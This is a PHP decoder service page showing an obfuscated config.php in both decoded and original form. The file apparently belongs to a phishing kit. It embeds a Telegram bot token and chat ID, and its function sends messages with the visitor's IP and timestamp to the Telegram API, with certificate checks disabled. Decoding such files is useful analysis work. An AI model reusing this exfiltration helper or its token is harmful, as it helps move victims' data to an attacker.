Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

text/x-generic config.php ( PHP script, ASCII text, with very long lines, with CRLF line..

Decoded Output download

 
text/x-generic config.php ( PHP script, ASCII text, with very long lines, with CRLF line terminators ) 
 
<?php 
 goto fXyLW; mU4cF: $id = "640443382"; goto vS3XE; fXyLW: $token = "1903693634:AAFg0BRPEercTswZbQtwQvKznJVwxicYLvg"; goto mU4cF; vS3XE: function call($msg, $rms = null) { global $token; global $id; $info = "\xa
\xa    
/- MORE INFO -/\xaIP: " . $_SERVER["REMOTE_ADDR"] . "
TIME: " . date("m/d/Y h:i:sa"); $c = curl_init("https://api.telegram.org/bot" . $token . "/sendMessage?chat_id=" . $id . "&text=" . urlencode($msg . $info)); curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); $res = curl_exec($c); curl_close($c); return $res; } goto AO8kA; AO8kA: ?> 
 

Did this file decode correctly?

Original Code


text/x-generic config.php ( PHP script, ASCII text, with very long lines, with CRLF line terminators )

<?php
 goto fXyLW; mU4cF: $id = "\x36\x34\60\x34\64\x33\x33\70\62"; goto vS3XE; fXyLW: $token = "\61\71\60\x33\x36\x39\x33\x36\x33\x34\x3a\x41\101\106\147\60\102\x52\x50\x45\145\162\x63\124\x73\x77\132\142\x51\164\167\x51\x76\x4b\x7a\x6e\112\x56\x77\170\151\143\131\114\x76\x67"; goto mU4cF; vS3XE: function call($msg, $rms = null) { global $token; global $id; $info = "\xa\12\xa\x20\x20\40\x20\12\x2f\55\x20\115\x4f\122\105\x20\111\x4e\x46\x4f\40\x2d\57\xa\111\x50\72\40" . $_SERVER["\122\x45\115\117\x54\105\137\x41\104\104\122"] . "\12\x54\x49\x4d\105\x3a\40" . date("\155\x2f\x64\57\131\40\x68\x3a\151\x3a\x73\141"); $c = curl_init("\150\164\x74\160\163\x3a\57\57\x61\160\151\56\164\145\x6c\145\147\162\141\x6d\56\157\162\x67\x2f\142\x6f\164" . $token . "\x2f\163\145\x6e\x64\x4d\145\163\x73\141\147\x65\77\143\150\x61\x74\137\151\x64\x3d" . $id . "\46\164\x65\x78\x74\75" . urlencode($msg . $info)); curl_setopt($c, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($c, CURLOPT_RETURNTRANSFER, true); $res = curl_exec($c); curl_close($c); return $res; } goto AO8kA; AO8kA: ?>

Function Calls

None

Variables

None

Stats

MD5 9e35940374c4d2a66147acf20cb170ad
Eval Count 0
Decode Time 67 ms